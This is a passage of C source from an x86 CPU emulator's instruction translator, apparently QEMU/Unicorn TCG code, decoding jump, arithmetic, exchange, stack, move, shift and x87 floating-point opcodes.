offsetof(CPUX86State, eip)); gen_jr(s, s->tmp4); break; case 4: /* jmp Ev */ if (dflag == MO_16) { tcg_gen_ext16u_tl(tcg_ctx, s->T0, s->T0); } gen_op_jmp_v(tcg_ctx, s->T0); gen_bnd_jmp(s); gen_jr(s, s->T0); break; case 5: /* ljmp Ev */ if (mod == 3) { goto illegal_op; } gen_op_ld_v(s, ot, s->T1, s->A0); gen_add_A0_im(s, 1 << ot); gen_op_ld_v(s, MO_16, s->T0, s->A0); do_ljmp: if (s->pe && !s->vm86) { tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, s->T0); gen_helper_ljmp_protected(tcg_ctx, tcg_ctx->cpu_env, s->tmp2_i32, s->T1, tcg_const_tl(tcg_ctx, s->pc - s->cs_base)); } else { gen_op_movl_seg_T0_vm(s, R_CS); gen_op_jmp_v(tcg_ctx, s->T1); } tcg_gen_ld_tl(tcg_ctx, s->tmp4, tcg_ctx->cpu_env, offsetof(CPUX86State, eip)); gen_jr(s, s->tmp4); break; case 6: /* push Ev */ gen_push_v(s, s->T0); break; default: goto unknown_op; } break; case 0x84: /* test Ev, Gv */ case 0x85: ot = mo_b_d(b, dflag); modrm = x86_ldub_code(env, s); reg = ((modrm >> 3) & 7) | rex_r; gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); gen_op_mov_v_reg(s, ot, s->T1, reg); gen_op_testl_T0_T1_cc(s); set_cc_op(s, CC_OP_LOGICB + ot); break; case 0xa8: /* test eAX, Iv */ case 0xa9: ot = mo_b_d(b, dflag); val = insn_get(env, s, ot); gen_op_mov_v_reg(s, ot, s->T0, OR_EAX); tcg_gen_movi_tl(tcg_ctx, s->T1, val); gen_op_testl_T0_T1_cc(s); set_cc_op(s, CC_OP_LOGICB + ot); break; case 0x98: /* CWDE/CBW */ switch (dflag) { #ifdef TARGET_X86_64 case MO_64: gen_op_mov_v_reg(s, MO_32, s->T0, R_EAX); tcg_gen_ext32s_tl(tcg_ctx, s->T0, s->T0); gen_op_mov_reg_v(s, MO_64, R_EAX, s->T0); break; #endif case MO_32: gen_op_mov_v_reg(s, MO_16, s->T0, R_EAX); tcg_gen_ext16s_tl(tcg_ctx, s->T0, s->T0); gen_op_mov_reg_v(s, MO_32, R_EAX, s->T0); break; case MO_16: gen_op_mov_v_reg(s, MO_8, s->T0, R_EAX); tcg_gen_ext8s_tl(tcg_ctx, s->T0, s->T0); gen_op_mov_reg_v(s, MO_16, R_EAX, s->T0); break; default: tcg_abort(); } break; case 0x99: /* CDQ/CWD */ switch (dflag) { #ifdef TARGET_X86_64 case MO_64: gen_op_mov_v_reg(s, MO_64, s->T0, R_EAX); tcg_gen_sari_tl(tcg_ctx, s->T0, s->T0, 63); gen_op_mov_reg_v(s, MO_64, R_EDX, s->T0); break; #endif case MO_32: gen_op_mov_v_reg(s, MO_32, s->T0, R_EAX); tcg_gen_ext32s_tl(tcg_ctx, s->T0, s->T0); tcg_gen_sari_tl(tcg_ctx, s->T0, s->T0, 31); gen_op_mov_reg_v(s, MO_32, R_EDX, s->T0); break; case MO_16: gen_op_mov_v_reg(s, MO_16, s->T0, R_EAX); tcg_gen_ext16s_tl(tcg_ctx, s->T0, s->T0); tcg_gen_sari_tl(tcg_ctx, s->T0, s->T0, 15); gen_op_mov_reg_v(s, MO_16, R_EDX, s->T0); break; default: tcg_abort(); } break; case 0x1af: /* imul Gv, Ev */ case 0x69: /* imul Gv, Ev, I */ case 0x6b: ot = dflag; modrm = x86_ldub_code(env, s); reg = ((modrm >> 3) & 7) | rex_r; if (b == 0x69) s->rip_offset = insn_const_size(ot); else if (b == 0x6b) s->rip_offset = 1; gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); if (b == 0x69) { val = insn_get(env, s, ot); tcg_gen_movi_tl(tcg_ctx, s->T1, val); } else if (b == 0x6b) { val = (int8_t)insn_get(env, s, MO_8); tcg_gen_movi_tl(tcg_ctx, s->T1, val); } else { gen_op_mov_v_reg(s, ot, s->T1, reg); } switch (ot) { #ifdef TARGET_X86_64 case MO_64: tcg_gen_muls2_i64(tcg_ctx, tcg_ctx->cpu_regs[reg], s->T1, s->T0, s->T1); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, tcg_ctx->cpu_regs[reg]); tcg_gen_sari_tl(tcg_ctx, tcg_ctx->cpu_cc_src, tcg_ctx->cpu_cc_dst, 63); tcg_gen_sub_tl(tcg_ctx, tcg_ctx->cpu_cc_src, tcg_ctx->cpu_cc_src, s->T1); break; #endif case MO_32: tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, s->T0); tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp3_i32, s->T1); tcg_gen_muls2_i32(tcg_ctx, s->tmp2_i32, s->tmp3_i32, s->tmp2_i32, s->tmp3_i32); tcg_gen_extu_i32_tl(tcg_ctx, tcg_ctx->cpu_regs[reg], s->tmp2_i32); tcg_gen_sari_i32(tcg_ctx, s->tmp2_i32, s->tmp2_i32, 31); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, tcg_ctx->cpu_regs[reg]); tcg_gen_sub_i32(tcg_ctx, s->tmp2_i32, s->tmp2_i32, s->tmp3_i32); tcg_gen_extu_i32_tl(tcg_ctx, tcg_ctx->cpu_cc_src, s->tmp2_i32); break; default: tcg_gen_ext16s_tl(tcg_ctx, s->T0, s->T0); tcg_gen_ext16s_tl(tcg_ctx, s->T1, s->T1); /* XXX: use 32 bit mul which could be faster */ tcg_gen_mul_tl(tcg_ctx, s->T0, s->T0, s->T1); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, s->T0); tcg_gen_ext16s_tl(tcg_ctx, s->tmp0, s->T0); tcg_gen_sub_tl(tcg_ctx, tcg_ctx->cpu_cc_src, s->T0, s->tmp0); gen_op_mov_reg_v(s, ot, reg, s->T0); break; } set_cc_op(s, CC_OP_MULB + ot); break; case 0x1c0: case 0x1c1: /* xadd Ev, Gv */ ot = mo_b_d(b, dflag); modrm = x86_ldub_code(env, s); reg = ((modrm >> 3) & 7) | rex_r; mod = (modrm >> 6) & 3; gen_op_mov_v_reg(s, ot, s->T0, reg); if (mod == 3) { rm = (modrm & 7) | REX_B(s); gen_op_mov_v_reg(s, ot, s->T1, rm); tcg_gen_add_tl(tcg_ctx, s->T0, s->T0, s->T1); gen_op_mov_reg_v(s, ot, reg, s->T1); gen_op_mov_reg_v(s, ot, rm, s->T0); } else { gen_lea_modrm(env, s, modrm); if (s->prefix & PREFIX_LOCK) { tcg_gen_atomic_fetch_add_tl(tcg_ctx, s->T1, s->A0, s->T0, s->mem_index, ot | MO_LE); tcg_gen_add_tl(tcg_ctx, s->T0, s->T0, s->T1); } else { gen_op_ld_v(s, ot, s->T1, s->A0); tcg_gen_add_tl(tcg_ctx, s->T0, s->T0, s->T1); gen_op_st_v(s, ot, s->T0, s->A0); } gen_op_mov_reg_v(s, ot, reg, s->T1); } gen_op_update2_cc(s); set_cc_op(s, CC_OP_ADDB + ot); break; case 0x1b0: case 0x1b1: /* cmpxchg Ev, Gv */ { TCGv oldv, newv, cmpv; ot = mo_b_d(b, dflag); modrm = x86_ldub_code(env, s); reg = ((modrm >> 3) & 7) | rex_r; mod = (modrm >> 6) & 3; oldv = tcg_temp_new(tcg_ctx); newv = tcg_temp_new(tcg_ctx); cmpv = tcg_temp_new(tcg_ctx); gen_op_mov_v_reg(s, ot, newv, reg); tcg_gen_mov_tl(tcg_ctx, cmpv, tcg_ctx->cpu_regs[R_EAX]); if (s->prefix & PREFIX_LOCK) { if (mod == 3) { goto illegal_op; } gen_lea_modrm(env, s, modrm); tcg_gen_atomic_cmpxchg_tl(tcg_ctx, oldv, s->A0, cmpv, newv, s->mem_index, ot | MO_LE); gen_op_mov_reg_v(s, ot, R_EAX, oldv); } else { if (mod == 3) { rm = (modrm & 7) | REX_B(s); gen_op_mov_v_reg(s, ot, oldv, rm); } else { gen_lea_modrm(env, s, modrm); gen_op_ld_v(s, ot, oldv, s->A0); rm = 0; /* avoid warning */ } gen_extu(tcg_ctx, ot, oldv); gen_extu(tcg_ctx, ot, cmpv); /* store value = (old == cmp ? new : old); */ tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, newv, oldv, cmpv, newv, oldv); if (mod == 3) { gen_op_mov_reg_v(s, ot, R_EAX, oldv); gen_op_mov_reg_v(s, ot, rm, newv); } else { /* Perform an unconditional store cycle like physical cpu; must be before changing accumulator to ensure idempotency if the store faults and the instruction is restarted */ gen_op_st_v(s, ot, newv, s->A0); gen_op_mov_reg_v(s, ot, R_EAX, oldv); } } tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_src, oldv); tcg_gen_mov_tl(tcg_ctx, s->cc_srcT, cmpv); tcg_gen_sub_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, cmpv, oldv); set_cc_op(s, CC_OP_SUBB + ot); tcg_temp_free(tcg_ctx, oldv); tcg_temp_free(tcg_ctx, newv); tcg_temp_free(tcg_ctx, cmpv); } break; case 0x1c7: /* cmpxchg8b */ modrm = x86_ldub_code(env, s); mod = (modrm >> 6) & 3; switch ((modrm >> 3) & 7) { case 1: /* CMPXCHG8, CMPXCHG16 */ if (mod == 3) { goto illegal_op; } #ifdef TARGET_X86_64 if (dflag == MO_64) { if (!(s->cpuid_ext_features & CPUID_EXT_CX16)) { goto illegal_op; } gen_lea_modrm(env, s, modrm); if ((s->prefix & PREFIX_LOCK) && (tb_cflags(s->base.tb) & CF_PARALLEL)) { gen_helper_cmpxchg16b(tcg_ctx, tcg_ctx->cpu_env, s->A0); } else { gen_helper_cmpxchg16b_unlocked(tcg_ctx, tcg_ctx->cpu_env, s->A0); } set_cc_op(s, CC_OP_EFLAGS); break; } #endif if (!(s->cpuid_features & CPUID_CX8)) { goto illegal_op; } gen_lea_modrm(env, s, modrm); if ((s->prefix & PREFIX_LOCK) && (tb_cflags(s->base.tb) & CF_PARALLEL)) { gen_helper_cmpxchg8b(tcg_ctx, tcg_ctx->cpu_env, s->A0); } else { gen_helper_cmpxchg8b_unlocked(tcg_ctx, tcg_ctx->cpu_env, s->A0); } set_cc_op(s, CC_OP_EFLAGS); break; case 7: /* RDSEED */ case 6: /* RDRAND */ if (mod != 3 || (s->prefix & (PREFIX_LOCK | PREFIX_REPZ | PREFIX_REPNZ)) || !(s->cpuid_ext_features & CPUID_EXT_RDRAND)) { goto illegal_op; } if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } gen_helper_rdrand(tcg_ctx, s->T0, tcg_ctx->cpu_env); rm = (modrm & 7) | REX_B(s); gen_op_mov_reg_v(s, dflag, rm, s->T0); set_cc_op(s, CC_OP_EFLAGS); if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { gen_jmp(s, s->pc - s->cs_base); } break; default: goto illegal_op; } break; /**************************/ /* push/pop */ case 0x50: /* push */ case 0x51: /* push */ case 0x52: /* push */ case 0x53: /* push */ case 0x54: /* push */ case 0x55: /* push */ case 0x56: /* push */ case 0x57: /* push */ gen_op_mov_v_reg(s, MO_32, s->T0, (b & 7) | REX_B(s)); gen_push_v(s, s->T0); break; case 0x58: /* pop */ case 0x59: /* pop */ case 0x5a: /* pop */ case 0x5b: /* pop */ case 0x5c: /* pop */ case 0x5d: /* pop */ case 0x5e: /* pop */ case 0x5f: /* pop */ ot = gen_pop_T0(s); /* NOTE: order is important for pop %sp */ gen_pop_update(s, ot); gen_op_mov_reg_v(s, ot, (b & 7) | REX_B(s), s->T0); break; case 0x60: /* pusha */ if (CODE64(s)) goto illegal_op; gen_pusha(s); break; case 0x61: /* popa */ if (CODE64(s)) goto illegal_op; gen_popa(s); break; case 0x68: /* push Iv */ case 0x6a: ot = mo_pushpop(s, dflag); if (b == 0x68) val = insn_get(env, s, ot); else val = (int8_t)insn_get(env, s, MO_8); tcg_gen_movi_tl(tcg_ctx, s->T0, val); gen_push_v(s, s->T0); break; case 0x8f: /* pop Ev */ modrm = x86_ldub_code(env, s); mod = (modrm >> 6) & 3; ot = gen_pop_T0(s); if (mod == 3) { /* NOTE: order is important for pop %sp */ gen_pop_update(s, ot); rm = (modrm & 7) | REX_B(s); gen_op_mov_reg_v(s, ot, rm, s->T0); } else { /* NOTE: order is important too for MMU exceptions */ s->popl_esp_hack = 1 << ot; gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 1); s->popl_esp_hack = 0; gen_pop_update(s, ot); } break; case 0xc8: /* enter */ { int level; val = x86_lduw_code(env, s); level = x86_ldub_code(env, s); gen_enter(s, val, level); } break; case 0xc9: /* leave */ gen_leave(s); break; case 0x06: /* push es */ case 0x0e: /* push cs */ case 0x16: /* push ss */ case 0x1e: /* push ds */ if (CODE64(s)) goto illegal_op; gen_op_movl_T0_seg(s, b >> 3); gen_push_v(s, s->T0); break; case 0x1a0: /* push fs */ case 0x1a8: /* push gs */ gen_op_movl_T0_seg(s, (b >> 3) & 7); gen_push_v(s, s->T0); break; case 0x07: /* pop es */ case 0x17: /* pop ss */ case 0x1f: /* pop ds */ if (CODE64(s)) goto illegal_op; reg = b >> 3; ot = gen_pop_T0(s); gen_movl_seg_T0(s, reg); gen_pop_update(s, ot); /* Note that reg == R_SS in gen_movl_seg_T0 always sets is_jmp. */ if (s->base.is_jmp) { gen_jmp_im(s, s->pc - s->cs_base); if (reg == R_SS) { s->tf = 0; gen_eob_inhibit_irq(s, true); } else { gen_eob(s); } } break; case 0x1a1: /* pop fs */ case 0x1a9: /* pop gs */ ot = gen_pop_T0(s); gen_movl_seg_T0(s, (b >> 3) & 7); gen_pop_update(s, ot); if (s->base.is_jmp) { gen_jmp_im(s, s->pc - s->cs_base); gen_eob(s); } break; /**************************/ /* mov */ case 0x88: case 0x89: /* mov Gv, Ev */ ot = mo_b_d(b, dflag); modrm = x86_ldub_code(env, s); reg = ((modrm >> 3) & 7) | rex_r; /* generate a generic store */ gen_ldst_modrm(env, s, modrm, ot, reg, 1); break; case 0xc6: case 0xc7: /* mov Ev, Iv */ ot = mo_b_d(b, dflag); modrm = x86_ldub_code(env, s); mod = (modrm >> 6) & 3; reg = ((modrm >> 3) & 7) | rex_r; if (mod != 3) { if (reg != 0) goto illegal_op; s->rip_offset = insn_const_size(ot); gen_lea_modrm(env, s, modrm); } else { if (reg != 0 && reg != 7) goto illegal_op; } val = insn_get(env, s, ot); tcg_gen_movi_tl(tcg_ctx, s->T0, val); if (mod != 3) { gen_op_st_v(s, ot, s->T0, s->A0); } else { gen_op_mov_reg_v(s, ot, (modrm & 7) | REX_B(s), s->T0); } break; case 0x8a: case 0x8b: /* mov Ev, Gv */ ot = mo_b_d(b, dflag); modrm = x86_ldub_code(env, s); reg = ((modrm >> 3) & 7) | rex_r; gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); gen_op_mov_reg_v(s, ot, reg, s->T0); break; case 0x8e: /* mov seg, Gv */ modrm = x86_ldub_code(env, s); reg = (modrm >> 3) & 7; if (reg >= 6 || reg == R_CS) goto illegal_op; gen_ldst_modrm(env, s, modrm, MO_16, OR_TMP0, 0); gen_movl_seg_T0(s, reg); /* Note that reg == R_SS in gen_movl_seg_T0 always sets is_jmp. */ if (s->base.is_jmp) { gen_jmp_im(s, s->pc - s->cs_base); if (reg == R_SS) { s->tf = 0; gen_eob_inhibit_irq(s, true); } else { gen_eob(s); } } break; case 0x8c: /* mov Gv, seg */ modrm = x86_ldub_code(env, s); reg = (modrm >> 3) & 7; mod = (modrm >> 6) & 3; if (reg >= 6) goto illegal_op; gen_op_movl_T0_seg(s, reg); ot = mod == 3 ? dflag : MO_16; gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 1); break; case 0x1b6: /* movzbS Gv, Eb */ case 0x1b7: /* movzwS Gv, Eb */ case 0x1be: /* movsbS Gv, Eb */ case 0x1bf: /* movswS Gv, Eb */ { MemOp d_ot; MemOp s_ot; /* d_ot is the size of destination */ d_ot = dflag; /* ot is the size of source */ ot = (b & 1) + MO_8; /* s_ot is the sign+size of source */ s_ot = b & 8 ? MO_SIGN | ot : ot; modrm = x86_ldub_code(env, s); reg = ((modrm >> 3) & 7) | rex_r; mod = (modrm >> 6) & 3; rm = (modrm & 7) | REX_B(s); if (mod == 3) { if (s_ot == MO_SB && byte_reg_is_xH(s, rm)) { tcg_gen_sextract_tl(tcg_ctx, s->T0, tcg_ctx->cpu_regs[rm - 4], 8, 8); } else { gen_op_mov_v_reg(s, ot, s->T0, rm); switch (s_ot) { case MO_UB: tcg_gen_ext8u_tl(tcg_ctx, s->T0, s->T0); break; case MO_SB: tcg_gen_ext8s_tl(tcg_ctx, s->T0, s->T0); break; case MO_UW: tcg_gen_ext16u_tl(tcg_ctx, s->T0, s->T0); break; default: case MO_SW: tcg_gen_ext16s_tl(tcg_ctx, s->T0, s->T0); break; } } gen_op_mov_reg_v(s, d_ot, reg, s->T0); } else { gen_lea_modrm(env, s, modrm); gen_op_ld_v(s, s_ot, s->T0, s->A0); gen_op_mov_reg_v(s, d_ot, reg, s->T0); } } break; case 0x8d: /* lea */ modrm = x86_ldub_code(env, s); mod = (modrm >> 6) & 3; if (mod == 3) goto illegal_op; reg = ((modrm >> 3) & 7) | rex_r; { AddressParts a = gen_lea_modrm_0(env, s, modrm); TCGv ea = gen_lea_modrm_1(s, a); gen_lea_v_seg(s, s->aflag, ea, -1, -1); gen_op_mov_reg_v(s, dflag, reg, s->A0); } break; case 0xa0: /* mov EAX, Ov */ case 0xa1: case 0xa2: /* mov Ov, EAX */ case 0xa3: { target_ulong offset_addr; ot = mo_b_d(b, dflag); switch (s->aflag) { #ifdef TARGET_X86_64 case MO_64: offset_addr = x86_ldq_code(env, s); break; #endif default: offset_addr = insn_get(env, s, s->aflag); break; } tcg_gen_movi_tl(tcg_ctx, s->A0, offset_addr); gen_add_A0_ds_seg(s); if ((b & 2) == 0) { gen_op_ld_v(s, ot, s->T0, s->A0); gen_op_mov_reg_v(s, ot, R_EAX, s->T0); } else { gen_op_mov_v_reg(s, ot, s->T0, R_EAX); gen_op_st_v(s, ot, s->T0, s->A0); } } break; case 0xd7: /* xlat */ tcg_gen_mov_tl(tcg_ctx, s->A0, tcg_ctx->cpu_regs[R_EBX]); tcg_gen_ext8u_tl(tcg_ctx, s->T0, tcg_ctx->cpu_regs[R_EAX]); tcg_gen_add_tl(tcg_ctx, s->A0, s->A0, s->T0); gen_extu(tcg_ctx, s->aflag, s->A0); gen_add_A0_ds_seg(s); gen_op_ld_v(s, MO_8, s->T0, s->A0); gen_op_mov_reg_v(s, MO_8, R_EAX, s->T0); break; case 0xb0: /* mov R, Ib */ case 0xb1: /* mov R, Ib */ case 0xb2: /* mov R, Ib */ case 0xb3: /* mov R, Ib */ case 0xb4: /* mov R, Ib */ case 0xb5: /* mov R, Ib */ case 0xb6: /* mov R, Ib */ case 0xb7: /* mov R, Ib */ val = insn_get(env, s, MO_8); tcg_gen_movi_tl(tcg_ctx, s->T0, val); gen_op_mov_reg_v(s, MO_8, (b & 7) | REX_B(s), s->T0); break; case 0xb8: /* mov R, Iv */ case 0xb9: /* mov R, Iv */ case 0xba: /* mov R, Iv */ case 0xbb: /* mov R, Iv */ case 0xbc: /* mov R, Iv */ case 0xbd: /* mov R, Iv */ case 0xbe: /* mov R, Iv */ case 0xbf: /* mov R, Iv */ #ifdef TARGET_X86_64 if (dflag == MO_64) { uint64_t tmp; /* 64 bit case */ tmp = x86_ldq_code(env, s); reg = (b & 7) | REX_B(s); tcg_gen_movi_tl(tcg_ctx, s->T0, tmp); gen_op_mov_reg_v(s, MO_64, reg, s->T0); } else #endif { ot = dflag; val = insn_get(env, s, ot); reg = (b & 7) | REX_B(s); tcg_gen_movi_tl(tcg_ctx, s->T0, val); gen_op_mov_reg_v(s, ot, reg, s->T0); } break; case 0x91: /* xchg R, EAX */ case 0x92: /* xchg R, EAX */ case 0x93: /* xchg R, EAX */ case 0x94: /* xchg R, EAX */ case 0x95: /* xchg R, EAX */ case 0x96: /* xchg R, EAX */ case 0x97: /* xchg R, EAX */ do_xchg_reg_eax: ot = dflag; reg = (b & 7) | REX_B(s); rm = R_EAX; goto do_xchg_reg; case 0x86: case 0x87: /* xchg Ev, Gv */ ot = mo_b_d(b, dflag); modrm = x86_ldub_code(env, s); reg = ((modrm >> 3) & 7) | rex_r; mod = (modrm >> 6) & 3; if (mod == 3) { rm = (modrm & 7) | REX_B(s); do_xchg_reg: gen_op_mov_v_reg(s, ot, s->T0, reg); gen_op_mov_v_reg(s, ot, s->T1, rm); gen_op_mov_reg_v(s, ot, rm, s->T0); gen_op_mov_reg_v(s, ot, reg, s->T1); } else { gen_lea_modrm(env, s, modrm); gen_op_mov_v_reg(s, ot, s->T0, reg); /* for xchg, lock is implicit */ tcg_gen_atomic_xchg_tl(tcg_ctx, s->T1, s->A0, s->T0, s->mem_index, ot | MO_LE); gen_op_mov_reg_v(s, ot, reg, s->T1); } break; case 0xc4: /* les Gv */ /* In CODE64 this is VEX3; see above. */ op = R_ES; goto do_lxx; case 0xc5: /* lds Gv */ /* In CODE64 this is VEX2; see above. */ op = R_DS; goto do_lxx; case 0x1b2: /* lss Gv */ op = R_SS; goto do_lxx; case 0x1b4: /* lfs Gv */ op = R_FS; goto do_lxx; case 0x1b5: /* lgs Gv */ op = R_GS; do_lxx: ot = dflag != MO_16 ? MO_32 : MO_16; modrm = x86_ldub_code(env, s); reg = ((modrm >> 3) & 7) | rex_r; mod = (modrm >> 6) & 3; if (mod == 3) goto illegal_op; gen_lea_modrm(env, s, modrm); gen_op_ld_v(s, ot, s->T1, s->A0); gen_add_A0_im(s, 1 << ot); /* load the segment first to handle exceptions properly */ gen_op_ld_v(s, MO_16, s->T0, s->A0); gen_movl_seg_T0(s, op); /* then put the data */ gen_op_mov_reg_v(s, ot, reg, s->T1); if (s->base.is_jmp) { gen_jmp_im(s, s->pc - s->cs_base); gen_eob(s); } break; /************************/ /* shifts */ case 0xc0: case 0xc1: /* shift Ev,Ib */ shift = 2; grp2_label: { ot = mo_b_d(b, dflag); modrm = x86_ldub_code(env, s); mod = (modrm >> 6) & 3; op = (modrm >> 3) & 7; if (mod != 3) { if (shift == 2) { s->rip_offset = 1; } gen_lea_modrm(env, s, modrm); opreg = OR_TMP0; } else { opreg = (modrm & 7) | REX_B(s); } /* simpler op */ if (shift == 0) { gen_shift(s, op, ot, opreg, OR_ECX); } else { if (shift == 2) { shift = x86_ldub_code(env, s); } gen_shifti(s, op, ot, opreg, shift); } } break; case 0xd0: case 0xd1: /* shift Ev,1 */ shift = 1; goto grp2_label; case 0xd2: case 0xd3: /* shift Ev,cl */ shift = 0; goto grp2_label; case 0x1a4: /* shld imm */ op = 0; shift = 1; goto do_shiftd; case 0x1a5: /* shld cl */ op = 0; shift = 0; goto do_shiftd; case 0x1ac: /* shrd imm */ op = 1; shift = 1; goto do_shiftd; case 0x1ad: /* shrd cl */ op = 1; shift = 0; do_shiftd: ot = dflag; modrm = x86_ldub_code(env, s); mod = (modrm >> 6) & 3; rm = (modrm & 7) | REX_B(s); reg = ((modrm >> 3) & 7) | rex_r; if (mod != 3) { gen_lea_modrm(env, s, modrm); opreg = OR_TMP0; } else { opreg = rm; } gen_op_mov_v_reg(s, ot, s->T1, reg); if (shift) { TCGv imm = tcg_const_tl(tcg_ctx, x86_ldub_code(env, s)); gen_shiftd_rm_T1(s, ot, opreg, op, imm); tcg_temp_free(tcg_ctx, imm); } else { gen_shiftd_rm_T1(s, ot, opreg, op, tcg_ctx->cpu_regs[R_ECX]); } break; /************************/ /* floats */ case 0xd8: case 0xd9: case 0xda: case 0xdb: case 0xdc: case 0xdd: case 0xde: case 0xdf: { bool update_fip = true; if (s->flags & (HF_EM_MASK | HF_TS_MASK)) { /* if CR0.EM or CR0.TS are set, generate an FPU exception */ /* XXX: what to do if illegal op ? */ gen_exception(s, EXCP07_PREX, pc_start - s->cs_base); break; } modrm = x86_ldub_code(env, s); mod = (modrm >> 6) & 3; rm = modrm & 7; op = ((b & 7) << 3) | ((modrm >> 3) & 7); if (mod != 3) { /* memory op */ AddressParts a = gen_lea_modrm_0(env, s, modrm); TCGv ea = gen_lea_modrm_1(s, a); TCGv last_addr = tcg_temp_new(tcg_ctx); bool update_fdp = true; tcg_gen_mov_tl(tcg_ctx, last_addr, ea); gen_lea_v_seg(s, s->aflag, ea, a.def_seg, s->override); switch(op) { case 0x00: /* fxxxs */ case 0x01: /* fxxxs */ case 0x02: /* fxxxs */ case 0x03: /* fxxxs */ case 0x04: /* fxxxs */ case 0x05: /* fxxxs */ case 0x06: /* fxxxs */ case 0x07: /* fxxxs */ case 0x10: /* fixxxl */ case 0x11: /* fixxxl */ case 0x12: /* fixxxl */ case 0x13: /* fixxxl */ case 0x14: /* fixxxl */ case 0x15: /* fixxxl */ case 0x16: /* fixxxl */ case 0x17: /* fixxxl */ case 0x20: /* fxxxl */ case 0x21: /* fxxxl */ case 0x22: /* fxxxl */ case 0x23: /* fxxxl */ case 0x24: /* fxxxl */ case 0x25: /* fxxxl */ case 0x26: /* fxxxl */ case 0x27: /* fxxxl */ case 0x30: /* fixxx */ case 0x31: /* fixxx */ case 0x32: /* fixxx */ case 0x33: /* fixxx */ case 0x34: /* fixxx */ case 0x35: /* fixxx */ case 0x36: /* fixxx */ case 0x37: /* fixxx */ { int op1; op1 = op & 7; switch(op >> 4) { case 0: tcg_gen_qemu_ld_i32(tcg_ctx, s->tmp2_i32, s->A0, s->mem_index, MO_LEUL); gen_helper_flds_FT0(tcg_ctx, tcg_ctx->cpu_env, s->tmp2_i32); break; case 1: tcg_gen_qemu_ld_i32(tcg_ctx, s->tmp2_i32, s->A0, s->mem_index, MO_LEUL); gen_helper_fildl_FT0(tcg_ctx, tcg_ctx->cpu_env, s->tmp2_i32); break; case 2: tcg_gen_qemu_ld_i64(tcg_ctx, s->tmp1_i64, s->A0, s->mem_index, MO_LEQ); gen_helper_fldl_FT0(tcg_ctx, tcg_ctx->cpu_env, s->tmp1_i64); break; case 3: default: tcg_gen_qemu_ld_i32(tcg_ctx, s->tmp2_i32, s->A0, s->mem_index, MO_LESW); gen_helper_fildl_FT0(tcg_ctx, tcg_ctx->cpu_env, s->tmp2_i32); break; } gen_helper_fp_arith_ST0_FT0(tcg_ctx, op1); if (op1 == 3) { /* fcomp needs pop */ gen_helper_fpop(tcg_ctx, tcg_ctx->cpu_env); } } break; case 0x08: /* flds */ case 0x0a: /* fsts */ case 0x0b: /* fstps */ case 0x18: /* fildl, fisttpl, fistl, fistpl */ case 0x19: /* fildl, fisttpl, fistl, fistpl */ case 0x1a: /* fildl, fisttpl, fistl, fistpl */ case 0x1b: /* fildl, fisttpl, fistl, fistpl */ case 0x28: /* fldl, fisttpll, fstl, fstpl */ case 0x29: /* fldl, fisttpll, fstl, fstpl */ case 0x2a: /* fldl, fisttpll, fstl, fstpl */ case 0x2b: /* fldl, fisttpll, fstl, fstpl */ case 0x38: /* filds, fisttps, fists, fistps */ case 0x39: /* filds, fisttps, fists, fistps */ case 0x3a: /* filds, fisttps, fists, fistps */ case 0x3b: /* filds, fisttps, fists, fistps */ switch(op & 7) { case 0: switch(op >> 4) { case 0: tcg_gen_qemu_ld_i32(tcg_ctx, s->tmp2_i32, s->A0, s->mem_index, MO_LEUL); gen_helper_flds_ST0(tcg_ctx, tcg_ctx->cpu_env, s->tmp2_i32); break; case 1: tcg_gen_qemu_ld_i32(tcg_ctx, s->tmp2_i32, s->A0, s->mem_index, MO_LEUL); gen_helper_fildl_ST0(tcg_ctx, tcg_ctx->cpu_env, s->tmp2_i32); break; case 2: tcg_gen_qemu_ld_i64(tcg_ctx, s->tmp1_i64, s->A0, s->mem_index, MO_LEQ); gen_helper_fldl_ST0(tcg_ctx, tcg_ctx->cpu_env, s->tmp1_i64); break; case 3: default: tcg_gen_qemu_ld_i32(tcg_ctx, s->tmp2_i32, s->A0, s->mem_index, MO_LESW); gen_helper_fildl_ST0(tcg_ctx, tcg_ctx->cpu_env, s->tmp2_i32); break; } break; case 1: /* XXX: the corresponding CPUID bit must be tested ! */ switch(op >> 4) { case 1: gen_helper_fisttl_ST0(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env); tcg_gen_qemu_st_i32(tcg_ctx, s->tmp2_i32, s->A0, s->mem_index, MO_LEUL); break; case 2: gen_helper_fisttll_ST0(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_env); tcg_gen_qemu_st_i64(tcg_ctx, s->tmp1_i64, s->A0, s->mem_index, MO_LEQ); break; case 3: default: gen_helper_fistt_ST0(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env); tcg_gen_qemu_st_i32(tcg_ctx, s->tmp2_i32, s->A0, s->mem_index, MO_LEUW); break; } gen_helper_fpop(tcg_ctx, tcg_ctx->cpu_env); break; default: switch(op >> 4) { case 0: gen_helper_fsts_ST0(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env); tcg_gen_qemu_st_i32(tcg_ctx, s->tmp2_i32, s->A0, s->mem_index, MO_LEUL); break; case 1: gen_helper_fistl_ST0(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env); tcg_gen_qemu_st_i32(tcg_ctx, s->tmp2_i32, s->A0, s->mem_index, MO_LEUL); break; case 2: gen_helper_fstl_ST0(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_env); tcg_gen_qemu_st_i64(tcg_ctx, s->tmp1_i64, s->A0, s->mem_index, MO_LEQ); break; case 3: default: gen_helper_fist_ST0(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env); tcg_gen_qemu_st_i32(tcg_ctx, s->tmp2_i32, s->A0, s->mem_index, 